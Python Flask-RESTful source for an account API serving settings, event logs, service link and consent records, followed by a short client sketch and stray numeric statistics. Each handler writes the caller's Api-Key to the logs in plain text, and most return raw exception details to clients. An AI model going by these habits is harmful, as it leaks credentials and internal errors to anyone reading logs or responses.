if schema_validation_result.errors:
logger.error("Invalid payload")
raise ApiError(code=400, title="Invalid payload", detail=dict(schema_validation_result.errors),
source=endpoint)
else:
logger.debug("JSON validation -> OK")
# Collect data
try:
attributes = json_data['data']['attributes']
except Exception as exp:
error_title = "Could not collect data"
logger.error(error_title)
raise ApiError(code=400, title=error_title, detail=repr(exp), source=endpoint)
# Add Setting
try:
logger.info("Adding Setting")
db_entries = add_setting(account_id=account_id, attributes=attributes)
except Exception as exp:
error_title = "Could not add Setting entry"
logger.error(error_title)
raise ApiError(code=404, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("Setting added")
# Response data container
try:
response_data = {}
response_data['data'] = db_entries
except Exception as exp:
logger.error('Could not prepare response data: ' + repr(exp))
raise ApiError(code=500, title="Could not prepare response data", detail=repr(exp), source=endpoint)
else:
logger.info('Response data ready')
logger.debug('response_data: ' + repr(response_data))
response_data_dict = dict(response_data)
logger.debug('response_data_dict: ' + repr(response_data_dict))
return make_json_response(data=response_data_dict, status_code=201)
class AccountSetting(Resource):
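"""
Account API resource for a single Setting entry of an Account.

GET fetches the entry identified by settings_id via get_setting().
PATCH validates the payload with SettingsSchemaForUpdate, requires the
payload id to match settings_id from the path and updates the entry via
update_setting().
"""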
@requires_api_auth_user
def get(self, account_id, settings_id):
logger.info("AccountSetting")
try:
endpoint = str(api.url_for(self, account_id=account_id, settings_id=settings_id))
except Exception as exp:
endpoint = str(__name__)
try:
logger.info("Fetching Api-Key from Headers")
api_key = request.headers.get('Api-Key')
except Exception as exp:
logger.error("No ApiKey in headers: " + repr(repr(exp)))
return provideApiKey(endpoint=endpoint)
else:
logger.info("Api-Key: " + api_key)
try:
account_id = str(account_id)
except Exception as exp:
error_title = "Unsupported account_id"
logger.error(error_title)
raise ApiError(code=400, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("account_id: " + account_id)
try:
settings_id = str(settings_id)
except Exception as exp:
error_title = "Unsupported settings_id"
logger.error(error_title + repr(exp))
raise ApiError(code=400, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("settings_id: " + settings_id)
# Check if Account IDs from path and ApiKey are matching
if verify_account_id_match(account_id=account_id, api_key=api_key, endpoint=endpoint):
logger.info("Account IDs are matching")
# Get Setting
try:
logger.info("Fetching Setting")
db_entries = get_setting(account_id=account_id, id=settings_id)
except Exception as exp:
error_title = "No Setting found"
logger.error(error_title)
raise ApiError(code=404, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("Setting Fetched")
# Response data container
try:
response_data = {}
response_data['data'] = db_entries
except Exception as exp:
logger.error('Could not prepare response data: ' + repr(exp))
raise ApiError(code=500, title="Could not prepare response data", detail=repr(exp), source=endpoint)
else:
logger.info('Response data ready')
logger.debug('response_data: ' + repr(response_data))
response_data_dict = dict(response_data)
logger.debug('response_data_dict: ' + repr(response_data_dict))
return make_json_response(data=response_data_dict, status_code=200)
@requires_api_auth_user
def patch(self, account_id, settings_id):
logger.info("AccountSetting")
try:
endpoint = str(api.url_for(self, account_id=account_id, settings_id=settings_id))
except Exception as exp:
endpoint = str(__name__)
try:
logger.info("Fetching Api-Key from Headers")
api_key = request.headers.get('Api-Key')
except Exception as exp:
logger.error("No ApiKey in headers: " + repr(repr(exp)))
return provideApiKey(endpoint=endpoint)
else:
logger.info("Api-Key: " + api_key)
try:
account_id = str(account_id)
except Exception as exp:
error_title = "Unsupported account_id"
logger.error(error_title)
raise ApiError(code=400, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("account_id: " + account_id)
try:
settings_id = str(settings_id)
except Exception as exp:
error_title = "Unsupported settings_id"
logger.error(error_title + repr(exp))
raise ApiError(code=400, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("settings_id: " + settings_id)
# Check if Account IDs from path and ApiKey are matching
if verify_account_id_match(account_id=account_id, api_key=api_key, endpoint=endpoint):
logger.info("Account IDs from path and ApiKey are matching")
# load JSON from payload
json_data = request.get_json()
if not json_data:
error_detail = {'0': 'Set application/json as Content-Type', '1': 'Provide json payload'}
raise ApiError(code=400, title="No input data provided", detail=error_detail, source=endpoint)
else:
logger.debug("json_data: " + json.dumps(json_data))
# Validate payload content
schema = SettingsSchemaForUpdate()
schema_validation_result = schema.load(json_data)
# Check validation errors
if schema_validation_result.errors:
logger.error("Invalid payload")
raise ApiError(code=400, title="Invalid payload", detail=dict(schema_validation_result.errors), source=endpoint)
else:
logger.debug("JSON validation -> OK")
try:
settings_id_from_payload = json_data['data'].get("id", "")
except Exception as exp:
error_title = "Could not get id from payload"
logger.error(error_title)
raise ApiError(
code=404,
title=error_title,
detail=repr(exp),
source=endpoint
)
# Check if settings_id from path and payload are matching
if settings_id != settings_id_from_payload:
error_title = "Setting IDs from path and payload are not matching"
compared_ids = {'IdFromPath': settings_id, 'IdFromPayload': settings_id_from_payload}
logger.error(error_title + ", " + json.dumps(compared_ids))
raise ApiError(
code=403,
title=error_title,
detail=compared_ids,
source=endpoint
)
else:
logger.info("Setting IDs from path and payload are matching")
# Collect data
try:
attributes = json_data['data']['attributes']
except Exception as exp:
error_title = "Could not collect data"
logger.error(error_title)
raise ApiError(code=400, title=error_title, detail=repr(exp), source=endpoint)
# Update Setting
try:
logger.info("Updating Setting")
db_entries = update_setting(account_id=account_id, id=settings_id, attributes=attributes)
except Exception as exp:
# TODO: Error handling on more detailed level
error_title = "No Setting found"
logger.error(error_title)
raise ApiError(code=404, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("Setting Updated")
# Response data container
try:
response_data = {}
response_data['data'] = db_entries
except Exception as exp:
logger.error('Could not prepare response data: ' + repr(exp))
raise ApiError(code=500, title="Could not prepare response data", detail=repr(exp), source=endpoint)
else:
logger.info('Response data ready')
logger.debug('response_data: ' + repr(response_data))
response_data_dict = dict(response_data)
logger.debug('response_data_dict: ' + repr(response_data_dict))
return make_json_response(data=response_data_dict, status_code=200)
class AccountEventLogs(Resource):
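"""
Read-only Account API resource for the Event Log of an Account.
GET lists all event log entries of account_id via get_event_logs().
"""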
@requires_api_auth_user
def get(self, account_id):
logger.info("AccountEventLogs")
try:
endpoint = str(api.url_for(self, account_id=account_id))
except Exception as exp:
endpoint = str(__name__)
try:
logger.info("Fetching Api-Key from Headers")
api_key = request.headers.get('Api-Key')
except Exception as exp:
logger.error("No ApiKey in headers: " + repr(repr(exp)))
return provideApiKey(endpoint=endpoint)
else:
logger.info("Api-Key: " + api_key)
try:
account_id = str(account_id)
except Exception as exp:
error_title = "Unsupported account_id"
logger.error(error_title)
raise ApiError(code=400, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("account_id: " + account_id)
# Check if Account IDs from path and ApiKey are matching
if verify_account_id_match(account_id=account_id, api_key=api_key, endpoint=endpoint):
logger.info("Account IDs are matching")
# Get EventLog
try:
logger.info("Fetching EventLog")
db_entries = get_event_logs(account_id=account_id)
except Exception as exp:
error_title = "No EventLog found"
logger.error(error_title + repr(exp))
raise ApiError(code=404, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("EventLog Fetched")
# Response data container
try:
db_entry_list = db_entries
response_data = {}
response_data['data'] = db_entry_list
except Exception as exp:
logger.error('Could not prepare response data: ' + repr(exp))
raise ApiError(code=500, title="Could not prepare response data", detail=repr(exp), source=endpoint)
else:
logger.info('Response data ready')
logger.debug('response_data: ' + repr(response_data))
response_data_dict = dict(response_data)
logger.debug('response_data_dict: ' + repr(response_data_dict))
return make_json_response(data=response_data_dict, status_code=200)
class AccountEventLog(Resource):
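"""
Read-only Account API resource for a single Event Log entry,
fetched by event_log_id via get_event_log().
"""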
@requires_api_auth_user
def get(self, account_id, event_log_id):
logger.info("AccountEventLog")
try:
endpoint = str(api.url_for(self, account_id=account_id, event_log_id=event_log_id))
except Exception as exp:
endpoint = str(__name__)
try:
logger.info("Fetching Api-Key from Headers")
api_key = request.headers.get('Api-Key')
except Exception as exp:
logger.error("No ApiKey in headers: " + repr(repr(exp)))
return provideApiKey(endpoint=endpoint)
else:
logger.info("Api-Key: " + api_key)
try:
account_id = str(account_id)
except Exception as exp:
error_title = "Unsupported account_id"
logger.error(error_title)
raise ApiError(code=400, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("account_id: " + account_id)
try:
event_log_id = str(event_log_id)
except Exception as exp:
error_title = "Unsupported event_log_id"
logger.error(error_title + repr(exp))
raise ApiError(code=400, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("event_log_id: " + event_log_id)
# Check if Account IDs from path and ApiKey are matching
if verify_account_id_match(account_id=account_id, api_key=api_key, endpoint=endpoint):
logger.info("Account IDs are matching")
# Get EventLog
try:
logger.info("Fetching EventLog")
db_entries = get_event_log(account_id=account_id, id=event_log_id)
except Exception as exp:
error_title = "No EventLog found"
logger.error(error_title)
raise ApiError(code=404, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("EventLog Fetched")
# Response data container
try:
response_data = {}
response_data['data'] = db_entries
except Exception as exp:
logger.error('Could not prepare response data: ' + repr(exp))
raise ApiError(code=500, title="Could not prepare response data", detail=repr(exp), source=endpoint)
else:
logger.info('Response data ready')
logger.debug('response_data: ' + repr(response_data))
response_data_dict = dict(response_data)
logger.debug('response_data_dict: ' + repr(response_data_dict))
return make_json_response(data=response_data_dict, status_code=200)
class AccountServiceLinkRecords(Resource):
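"""
Read-only Account API resource for the Service Link Records of an
Account. GET lists them via get_slrs().
"""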
@requires_api_auth_user
def get(self, account_id):
logger.info("AccountServiceLinkRecords")
try:
endpoint = str(api.url_for(self, account_id=account_id))
except Exception as exp:
endpoint = str(__name__)
try:
logger.info("Fetching Api-Key from Headers")
api_key = request.headers.get('Api-Key')
except Exception as exp:
logger.error("No ApiKey in headers: " + repr(repr(exp)))
return provideApiKey(endpoint=endpoint)
else:
logger.info("Api-Key: " + api_key)
try:
account_id = str(account_id)
except Exception as exp:
error_title = "Unsupported account_id"
logger.error(error_title)
raise ApiError(code=400, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("account_id: " + account_id)
# Check if Account IDs from path and ApiKey are matching
if verify_account_id_match(account_id=account_id, api_key=api_key, endpoint=endpoint):
logger.info("Account IDs are matching")
# Get ServiceLinkRecords
try:
logger.info("Fetching ServiceLinkRecords")
db_entries = get_slrs(account_id=account_id)
except Exception as exp:
error_title = "No ServiceLinkRecords found"
logger.error(error_title + repr(exp))
raise ApiError(code=404, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("ServiceLinkRecords Fetched")
# Response data container
try:
db_entry_list = db_entries
response_data = {}
response_data['data'] = db_entry_list
except Exception as exp:
logger.error('Could not prepare response data: ' + repr(exp))
raise ApiError(code=500, title="Could not prepare response data", detail=repr(exp), source=endpoint)
else:
logger.info('Response data ready')
logger.debug('response_data: ' + repr(response_data))
response_data_dict = dict(response_data)
logger.debug('response_data_dict: ' + repr(response_data_dict))
return make_json_response(data=response_data_dict, status_code=200)
class AccountServiceLinkRecord(Resource):
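"""
Read-only Account API resource for a single Service Link Record,
fetched by slr_id via get_slr().
"""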
@requires_api_auth_user
def get(self, account_id, slr_id):
logger.info("AccountServiceLinkRecord")
try:
endpoint = str(api.url_for(self, account_id=account_id, slr_id=slr_id))
except Exception as exp:
endpoint = str(__name__)
try:
logger.info("Fetching Api-Key from Headers")
api_key = request.headers.get('Api-Key')
except Exception as exp:
logger.error("No ApiKey in headers: " + repr(repr(exp)))
return provideApiKey(endpoint=endpoint)
else:
logger.info("Api-Key: " + api_key)
try:
account_id = str(account_id)
except Exception as exp:
error_title = "Unsupported account_id"
logger.error(error_title)
raise ApiError(code=400, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("account_id: " + account_id)
try:
slr_id = str(slr_id)
except Exception as exp:
error_title = "Unsupported slr_id"
logger.error(error_title + repr(exp))
raise ApiError(code=400, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("slr_id: " + slr_id)
# Check if Account IDs from path and ApiKey are matching
if verify_account_id_match(account_id=account_id, api_key=api_key, endpoint=endpoint):
logger.info("Account IDs are matching")
# Get ServiceLinkRecord
try:
logger.info("Fetching ServiceLinkRecord")
db_entries = get_slr(account_id=account_id, slr_id=slr_id)
except Exception as exp:
error_title = "No ServiceLinkRecord found"
logger.error(error_title)
raise ApiError(code=404, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("ServiceLinkRecord Fetched")
# Response data container
try:
response_data = {}
response_data['data'] = db_entries
except Exception as exp:
logger.error('Could not prepare response data: ' + repr(exp))
raise ApiError(code=500, title="Could not prepare response data", detail=repr(exp), source=endpoint)
else:
logger.info('Response data ready')
logger.debug('response_data: ' + repr(response_data))
response_data_dict = dict(response_data)
logger.debug('response_data_dict: ' + repr(response_data_dict))
return make_json_response(data=response_data_dict, status_code=200)
class AccountServiceLinkStatusRecords(Resource):
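"""
Read-only Account API resource for the Status Records of a Service Link
Record. GET lists them via get_slsrs(); a StandardError from the data
layer maps to 403 (not accessible), any other failure to 404.
"""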
@requires_api_auth_user
def get(self, account_id, slr_id):
logger.info("AccountServiceLinkStatusRecords")
try:
endpoint = str(api.url_for(self, account_id=account_id, slr_id=slr_id))
except Exception as exp:
endpoint = str(__name__)
try:
logger.info("Fetching Api-Key from Headers")
api_key = request.headers.get('Api-Key')
except Exception as exp:
logger.error("No ApiKey in headers: " + repr(repr(exp)))
return provideApiKey(endpoint=endpoint)
else:
logger.info("Api-Key: " + api_key)
try:
account_id = str(account_id)
except Exception as exp:
error_title = "Unsupported account_id"
logger.error(error_title)
raise ApiError(code=400, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("account_id: " + account_id)
try:
slr_id = str(slr_id)
except Exception as exp:
error_title = "Unsupported slr_id"
logger.error(error_title)
raise ApiError(code=400, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("slr_id: " + slr_id)
# Check if Account IDs from path and ApiKey are matching
if verify_account_id_match(account_id=account_id, api_key=api_key, endpoint=endpoint):
logger.info("Account IDs are matching")
# Get ServiceLinkStatusRecords
try:
logger.info("Fetching ServiceLinkStatusRecords")
db_entries = get_slsrs(account_id=account_id, slr_id=slr_id)
except StandardError as exp:
error_title = "ServiceLinkStatusRecords not accessible"
logger.error(error_title + ": " + repr(exp))
raise ApiError(code=403, title=error_title, detail=repr(exp), source=endpoint)
except Exception as exp:
error_title = "No ServiceLinkStatusRecords found"
logger.error(error_title + repr(exp))
raise ApiError(code=404, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("ServiceLinkStatusRecords Fetched")
# Response data container
try:
db_entry_list = db_entries
response_data = {}
response_data['data'] = db_entry_list
except Exception as exp:
logger.error('Could not prepare response data: ' + repr(exp))
raise ApiError(code=500, title="Could not prepare response data", detail=repr(exp), source=endpoint)
else:
logger.info('Response data ready')
logger.debug('response_data: ' + repr(response_data))
response_data_dict = dict(response_data)
logger.debug('response_data_dict: ' + repr(response_data_dict))
return make_json_response(data=response_data_dict, status_code=200)
class AccountServiceLinkStatusRecord(Resource):
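"""
Read-only Account API resource for a single Service Link Status Record,
fetched by slsr_id via get_slsr().
"""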
@requires_api_auth_user
def get(self, account_id, slr_id, slsr_id):
logger.info("AccountServiceLinkStatusRecord")
try:
endpoint = str(api.url_for(self, account_id=account_id, slr_id=slr_id, slsr_id=slsr_id))
except Exception as exp:
endpoint = str(__name__)
try:
logger.info("Fetching Api-Key from Headers")
api_key = request.headers.get('Api-Key')
except Exception as exp:
logger.error("No ApiKey in headers: " + repr(repr(exp)))
return provideApiKey(endpoint=endpoint)
else:
logger.info("Api-Key: " + api_key)
try:
account_id = str(account_id)
except Exception as exp:
error_title = "Unsupported account_id"
logger.error(error_title)
raise ApiError(code=400, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("account_id: " + account_id)
try:
slr_id = str(slr_id)
except Exception as exp:
error_title = "Unsupported slr_id"
logger.error(error_title)
raise ApiError(code=400, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("slr_id: " + slr_id)
try:
slsr_id = str(slsr_id)
except Exception as exp:
error_title = "Unsupported slsr_id"
logger.error(error_title + repr(exp))
raise ApiError(code=400, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("slsr_id: " + slsr_id)
# Check if Account IDs from path and ApiKey are matching
if verify_account_id_match(account_id=account_id, api_key=api_key, endpoint=endpoint):
logger.info("Account IDs are matching")
# Get ServiceLinkStatusRecord
try:
logger.info("Fetching ServiceLinkStatusRecord")
db_entries = get_slsr(account_id=account_id, slr_id=slr_id, slsr_id=slsr_id)
except StandardError as exp:
error_title = "ServiceLinkStatusRecords not accessible"
logger.error(error_title + repr(exp))
raise ApiError(code=403, title=error_title, detail=repr(exp), source=endpoint)
except Exception as exp:
error_title = "No tServiceLinkStatusRecord found"
logger.error(error_title)
raise ApiError(code=404, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("ServiceLinkStatusRecord Fetched")
# Response data container
try:
response_data = {}
response_data['data'] = db_entries
except Exception as exp:
logger.error('Could not prepare response data: ' + repr(exp))
raise ApiError(code=500, title="Could not prepare response data", detail=repr(exp), source=endpoint)
else:
logger.info('Response data ready')
logger.debug('response_data: ' + repr(response_data))
response_data_dict = dict(response_data)
logger.debug('response_data_dict: ' + repr(response_data_dict))
return make_json_response(data=response_data_dict, status_code=200)
class AccountConsentRecords(Resource):
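"""
Read-only Account API resource for the Consent Records attached to a
Service Link Record. GET lists them via get_crs(); a StandardError maps
to 403, any other failure to 404.
"""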
@requires_api_auth_user
def get(self, account_id, slr_id):
logger.info("AccountConsentRecords")
try:
endpoint = str(api.url_for(self, account_id=account_id, slr_id=slr_id))
except Exception as exp:
endpoint = str(__name__)
try:
logger.info("Fetching Api-Key from Headers")
api_key = request.headers.get('Api-Key')
except Exception as exp:
logger.error("No ApiKey in headers: " + repr(repr(exp)))
return provideApiKey(endpoint=endpoint)
else:
logger.info("Api-Key: " + api_key)
try:
account_id = str(account_id)
except Exception as exp:
error_title = "Unsupported account_id"
logger.error(error_title)
raise ApiError(code=400, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("account_id: " + account_id)
try:
slr_id = str(slr_id)
except Exception as exp:
error_title = "Unsupported slr_id"
logger.error(error_title)
raise ApiError(code=400, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("slr_id: " + slr_id)
# Check if Account IDs from path and ApiKey are matching
if verify_account_id_match(account_id=account_id, api_key=api_key, endpoint=endpoint):
logger.info("Account IDs are matching")
# Get ConsentRecords
try:
logger.info("Fetching ConsentRecords")
db_entries = get_crs(account_id=account_id, slr_id=slr_id)
except StandardError as exp:
error_title = "ConsentRecords not accessible"
logger.error(error_title + ": " + repr(exp))
raise ApiError(code=403, title=error_title, detail=repr(exp), source=endpoint)
except Exception as exp:
error_title = "No ConsentRecords found"
logger.error(error_title + repr(exp))
raise ApiError(code=404, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("ConsentRecords Fetched")
# Response data container
try:
db_entry_list = db_entries
response_data = {}
response_data['data'] = db_entry_list
except Exception as exp:
logger.error('Could not prepare response data: ' + repr(exp))
raise ApiError(code=500, title="Could not prepare response data", detail=repr(exp), source=endpoint)
else:
logger.info('Response data ready')
logger.debug('response_data: ' + repr(response_data))
response_data_dict = dict(response_data)
logger.debug('response_data_dict: ' + repr(response_data_dict))
return make_json_response(data=response_data_dict, status_code=200)
class AccountConsentRecord(Resource):
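"""
Read-only Account API resource for a single Consent Record,
fetched by cr_id via get_cr().
"""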
@requires_api_auth_user
def get(self, account_id, slr_id, cr_id):
logger.info("AccountConsentRecord")
try:
endpoint = str(api.url_for(self, account_id=account_id, slr_id=slr_id, cr_id=cr_id))
except Exception as exp:
endpoint = str(__name__)
try:
logger.info("Fetching Api-Key from Headers")
api_key = request.headers.get('Api-Key')
except Exception as exp:
logger.error("No ApiKey in headers: " + repr(repr(exp)))
return provideApiKey(endpoint=endpoint)
else:
logger.info("Api-Key: " + api_key)
try:
account_id = str(account_id)
except Exception as exp:
error_title = "Unsupported account_id"
logger.error(error_title)
raise ApiError(code=400, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("account_id: " + account_id)
try:
slr_id = str(slr_id)
except Exception as exp:
error_title = "Unsupported slr_id"
logger.error(error_title)
raise ApiError(code=400, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("slr_id: " + slr_id)
try:
cr_id = str(cr_id)
except Exception as exp:
error_title = "Unsupported cr_id"
logger.error(error_title + repr(exp))
raise ApiError(code=400, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("cr_id: " + cr_id)
# Check if Account IDs from path and ApiKey are matching
if verify_account_id_match(account_id=account_id, api_key=api_key, endpoint=endpoint):
logger.info("Account IDs are matching")
# Get ConsentRecord
try:
logger.info("Fetching ConsentRecord")
db_entries = get_cr(account_id=account_id, slr_id=slr_id, cr_id=cr_id)
except StandardError as exp:
error_title = "ConsentRecord not accessible"
logger.error(error_title + ": " + repr(exp))
raise ApiError(code=403, title=error_title, detail=repr(exp), source=endpoint)
except Exception as exp:
error_title = "No ConsentRecord found"
logger.error(error_title + ": " + repr(exp))
raise ApiError(code=404, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("ConsentRecord Fetched")
# Response data container
try:
response_data = {}
response_data['data'] = db_entries
except Exception as exp:
logger.error('Could not prepare response data: ' + repr(exp))
raise ApiError(code=500, title="Could not prepare response data", detail=repr(exp), source=endpoint)
else:
logger.info('Response data ready')
logger.debug('response_data: ' + repr(response_data))
response_data_dict = dict(response_data)
logger.debug('response_data_dict: ' + repr(response_data_dict))
return make_json_response(data=response_data_dict, status_code=200)
class AccountConsentStatusRecords(Resource):
@requires_api_auth_user
def get(self, account_id, slr_id, cr_id):
logger.info("AccountConsentStatusRecords")
try:
endpoint = str(api.url_for(self, account_id=account_id, slr_id=slr_id, cr_id=cr_id))
except Exception as exp:
endpoint = str(__name__)
try:
logger.info("Fetching Api-Key from Headers")
api_key = request.headers.get('Api-Key')
except Exception as exp:
logger.error("No ApiKey in headers: " + repr(repr(exp)))
return provideApiKey(endpoint=endpoint)
else:
logger.info("Api-Key: " + api_key)
try:
account_id = str(account_id)
except Exception as exp:
error_title = "Unsupported account_id"
logger.error(error_title)
raise ApiError(code=400, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("account_id: " + account_id)
try:
slr_id = str(slr_id)
except Exception as exp:
error_title = "Unsupported slr_id"
logger.error(error_title)
raise ApiError(code=400, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("slr_id: " + slr_id)
try:
cr_id = str(cr_id)
except Exception as exp:
error_title = "Unsupported cr_id"
logger.error(error_title)
raise ApiError(code=400, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("cr_id: " + cr_id)
# Check if Account IDs from path and ApiKey are matching
if verify_account_id_match(account_id=account_id, api_key=api_key, endpoint=endpoint):
logger.info("Account IDs are matching")
# Get ConsentStatusRecords
try:
logger.info("Fetching ConsentStatusRecords")
db_entries = get_csrs(account_id=account_id, slr_id=slr_id, cr_id=cr_id)
except StandardError as exp:
error_title = "ConsentStatusRecords not accessible"
logger.error(error_title + ": " + repr(exp))
raise ApiError(code=403, title=error_title, detail=repr(exp), source=endpoint)
except Exception as exp:
error_title = "No ConsentStatusRecords found"
logger.error(error_title + ": " + repr(exp))
raise ApiError(code=404, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("ConsentStatusRecords Fetched")
# Response data container
try:
db_entry_list = db_entries
response_data = {}
response_data['data'] = db_entry_list
except Exception as exp:
logger.error('Could not prepare response data: ' + repr(exp))
raise ApiError(code=500, title="Could not prepare response data", detail=repr(exp), source=endpoint)
else:
logger.info('Response data ready')
logger.debug('response_data: ' + repr(response_data))
response_data_dict = dict(response_data)
logger.debug('response_data_dict: ' + repr(response_data_dict))
return make_json_response(data=response_data_dict, status_code=200)
class AccountConsentStatusRecord(Resource):
@requires_api_auth_user
def get(self, account_id, slr_id, cr_id, csr_id):
logger.info("AccountConsentStatusRecord")
try:
endpoint = str(api.url_for(self, account_id=account_id, slr_id=slr_id, cr_id=cr_id, csr_id=csr_id))
except Exception as exp:
endpoint = str(__name__)
try:
logger.info("Fetching Api-Key from Headers")
api_key = request.headers.get('Api-Key')
except Exception as exp:
logger.error("No ApiKey in headers: " + repr(repr(exp)))
return provideApiKey(endpoint=endpoint)
else:
logger.info("Api-Key: " + api_key)
try:
account_id = str(account_id)
except Exception as exp:
error_title = "Unsupported account_id"
logger.error(error_title)
raise ApiError(code=400, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("account_id: " + account_id)
try:
slr_id = str(slr_id)
except Exception as exp:
error_title = "Unsupported slr_id"
logger.error(error_title)
raise ApiError(code=400, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("slr_id: " + slr_id)
try:
cr_id = str(cr_id)
except Exception as exp:
error_title = "Unsupported cr_id"
logger.error(error_title + ": " + repr(exp))
raise ApiError(code=400, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("cr_id: " + cr_id)
try:
csr_id = str(csr_id)
except Exception as exp:
error_title = "Unsupported csr_id"
logger.error(error_title + ": " + repr(exp))
raise ApiError(code=400, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("csr_id: " + csr_id)
# Check if Account IDs from path and ApiKey are matching
if verify_account_id_match(account_id=account_id, api_key=api_key, endpoint=endpoint):
logger.info("Account IDs are matching")
# Get ConsentStatusRecord
try:
logger.info("Fetching ConsentStatusRecord")
db_entries = get_csr(account_id=account_id, slr_id=slr_id, cr_id=cr_id, csr_id=csr_id)
except StandardError as exp:
error_title = "ConsentStatusRecord not accessible"
logger.error(error_title + ": " + repr(exp))
raise ApiError(code=403, title=error_title, detail=repr(exp), source=endpoint)
except Exception as exp:
error_title = "No ConsentStatusRecord found"
logger.error(error_title + ": " + repr(exp))
raise ApiError(code=404, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("ConsentStatusRecord Fetched")
# Response data container
try:
response_data = {}
response_data['data'] = db_entries
except Exception as exp:
logger.error('Could not prepare response data: ' + repr(exp))
raise ApiError(code=500, title="Could not prepare response data", detail=repr(exp), source=endpoint)
else:
logger.info('Response data ready')
logger.debug('response_data: ' + repr(response_data))
response_data_dict = dict(response_data)
logger.debug('response_data_dict: ' + repr(response_data_dict))
return make_json_response(data=response_data_dict, status_code=200)
# Register resources
api.add_resource(Accounts, '/api/accounts/', '/', endpoint='/api/accounts/')
api.add_resource(AccountExport, '/api/accounts/<string:account_id>/export/', endpoint='account-export')
api.add_resource(AccountParticulars, '/api/accounts/<string:account_id>/particulars/', endpoint='account-particulars')
api.add_resource(AccountParticular, '/api/accounts/<string:account_id>/particulars/<string:particulars_id>/', endpoint='account-particular')
api.add_resource(AccountContacts, '/api/accounts/<string:account_id>/contacts/', endpoint='account-contacts')
api.add_resource(AccountContact, '/api/accounts/<string:account_id>/contacts/<string:contacts_id>/', endpoint='account-contact')
api.add_resource(AccountEmails, '/api/accounts/<string:account_id>/emails/', endpoint='account-emails')
api.add_resource(AccountEmail, '/api/accounts/<string:account_id>/emails/<string:emails_id>/', endpoint='account-email')
api.add_resource(AccountTelephones, '/api/accounts/<string:account_id>/telephones/', endpoint='account-telephones')
api.add_resource(AccountTelephone, '/api/accounts/<string:account_id>/telephones/<string:telephones_id>/', endpoint='account-telephone')
api.add_resource(AccountSettings, '/api/accounts/<string:account_id>/settings/', endpoint='account-settings')
api.add_resource(AccountSetting, '/api/accounts/<string:account_id>/settings/<string:settings_id>/', endpoint='account-setting')
api.add_resource(AccountEventLogs, '/api/accounts/<string:account_id>/logs/events/', endpoint='account-events')
api.add_resource(AccountEventLog, '/api/accounts/<string:account_id>/logs/events/<string:event_log_id>/', endpoint='account-event')
api.add_resource(AccountServiceLinkRecords, '/api/accounts/<string:account_id>/servicelinks/', endpoint='account-slrs')
api.add_resource(AccountServiceLinkRecord, '/api/accounts/<string:account_id>/servicelinks/<string:slr_id>/', endpoint='account-slr')
api.add_resource(AccountServiceLinkStatusRecords, '/api/accounts/<string:account_id>/servicelinks/<string:slr_id>/statuses/', endpoint='account-slsrs')
api.add_resource(AccountServiceLinkStatusRecord, '/api/accounts/<string:account_id>/servicelinks/<string:slr_id>/statuses/<string:slsr_id>/', endpoint='account-slsr')
api.add_resource(AccountConsentRecords, '/api/accounts/<string:account_id>/servicelinks/<string:slr_id>/consents/', endpoint='account-crs')
api.add_resource(AccountConsentRecord, '/api/accounts/<string:account_id>/servicelinks/<string:slr_id>/consents/<string:cr_id>/', endpoint='account-cr')
api.add_resource(AccountConsentStatusRecords, '/api/accounts/<string:account_id>/servicelinks/<string:slr_id>/consents/<string:cr_id>/statuses/', endpoint='account-csrs')
api.add_resource(AccountConsentStatusRecord, '/api/accounts/<string:account_id>/servicelinks/<string:slr_id>/consents/<string:cr_id>/statuses/<string:csr_id>/', endpoint='account-csr')
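For illustration, a minimal client-side sketch of calling one of the consent endpoints registered above. The host, port, identifiers, and the Api-Key value are all hypothetical; only the URL layout and the 'Api-Key' header are taken from the code itself.
# --- Hypothetical usage sketch (not part of the source file) ---
import requests
base = "http://localhost:8080"  # assumed host/port, not from the source
headers = {"Api-Key": "example-api-key"}  # header checked by requires_api_auth_user
url = base + "/api/accounts/1/servicelinks/slr-123/consents/cr-456/"
resp = requests.get(url, headers=headers)
print(resp.status_code, resp.json())  # expects {"data": ...} per make_json_response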
| 41.032768
| 184
| 0.619181
| 12,339
| 106,439
| 5.143367
| 0.024313
| 0.083008
| 0.051699
| 0.060822
| 0.877631
| 0.874228
| 0.867405
| 0.862599
| 0.850955
| 0.848922
| 0
| 0.008175
| 0.286342
| 106,439
| 2,593
| 185
| 41.048592
| 0.827306
| 0.04986
| 0
| 0.847711
| 0
| 0.001928
| 0.15711
| 0.017192
| 0
| 0
| 0
